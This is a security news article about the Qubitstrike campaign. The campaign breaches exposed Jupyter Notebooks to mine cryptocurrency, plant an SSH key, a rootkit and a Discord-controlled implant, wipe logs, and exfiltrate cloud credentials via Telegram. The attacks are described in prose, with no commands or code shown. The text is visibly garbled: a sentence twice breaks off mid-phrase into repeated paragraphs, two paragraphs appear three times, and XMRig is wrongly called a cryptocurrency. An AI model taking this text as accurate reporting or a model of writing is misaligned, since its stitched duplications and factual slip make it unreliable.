A threat actor, presumably from Tunisia, has been linked to a new campaign targeting exposed Jupyter Notebooks in a two-fold attempt to illicitly mine cryptocurrency and breach cloud environments.
Dubbed Qubitstrike by Cado, the intrusion set utilizes Telegram API to exfiltrate cloud service provider credentials following a successful compromise.
“The payloads for the Qubitstrike campaign are all hosted on codeberg.org – an alternative Git hosting platform, providing much of the same functionality as GitHub,” security researchers Matt Muir and Nate Bill said in a Wednesday write-up.
In the attack chain documented by the cloud security firm, publicly accessible Jupyter instances are breached to execute commands to retrieve a shell script (mi.sh) hosted on Codeberg.
The main payload, a shell script, is in charge of starting a cryptocurrency miner, creating persistence with a cron job, adding an attacker-controlled key to the.ssh/authorized_keys file for remote access, and using SSH to spread the malware to additional hosts.
The malware can also be used to download and install the Diamorphine rootkit, which hides malicious processes, and send back to the attacker the credentials for Google Cloud and Amazon Web Services (AWS) that have been intercepted via the Telegram bot API.
The renaming of trustworthy data transfer programs like curl and wget in an apparent effort to avoid detection and stop other users from using the tools is one notable feature of the attacks.
“mi.sh will also iterate through a hardcoded list of process names and attempt to kill the associated processes,” the investigators stated. “This is likely to thwart any mining operations by competitors who may have previously compromised the system.”
The shell script is additionally made to use the hard-coded list of IP/port pairs, which were previously linked to cryptojacking campaigns, along with the netstat command to terminate any active network connections to those IP addresses.
Furthermore, actions were taken to remove different Linux log files (such as /var/log/secure and /var/log/wtmp), which is another indication that the actors behind Qubitstrike are trying to hide from detection.
Although the threat actor’s precise origins are still unknown, evidence suggests that it most likely originated The shell script is additionally made to use the hard-coded list of IP/port pairs, which were previously linked to cryptojacking campaigns, along with the netstat command to terminate any active network connections to those IP addresses.
Furthermore, actions were taken to remove different Linux log files (such as /var/log/secure and /var/log/wtmp), which is another indication that the actors behind Qubitstrike are trying to hide from detection.
A more thorough look at the Codeberg repository also uncovered a Python implant (kdfs.py) designed to run on compromised hosts. Discord serves as a command-and-control (C2) mechanism for downloading and uploading files to and from the device.
Although the exact relationship between mi.sh and kdfs.py is still unknown, it is believed that the Python backdoor makes it easier for the shell script to be deployed. Furthermore, it seems that mi.sh can spread as malware independently of kdfs.py.
“Qubitstrike is a relatively sophisticated malware campaign, spearheaded by attackers with a particular focus on exploitation of cloud services,” according to the researchers.
Although the threat actor’s precise origins are still unknown, evidence suggests that it most likely originated The shell script is additionally made to use the hard-coded list of IP/port pairs, which were previously linked to cryptojacking campaigns, along with the netstat command to terminate any active network connections to those IP addresses.
Furthermore, actions were taken to remove different Linux log files (such as /var/log/secure and /var/log/wtmp), which is another indication that the actors behind Qubitstrike are trying to hide from detection.
Naturally, it seems that Qubitstrike’s main goal is to steal resources in order to mine the cryptocurrency XMRig. In spite of this, examination of the Discord C2 infrastructure reveals that, in practice, operators could launch any kind of attack once they had access to these weak hosts.”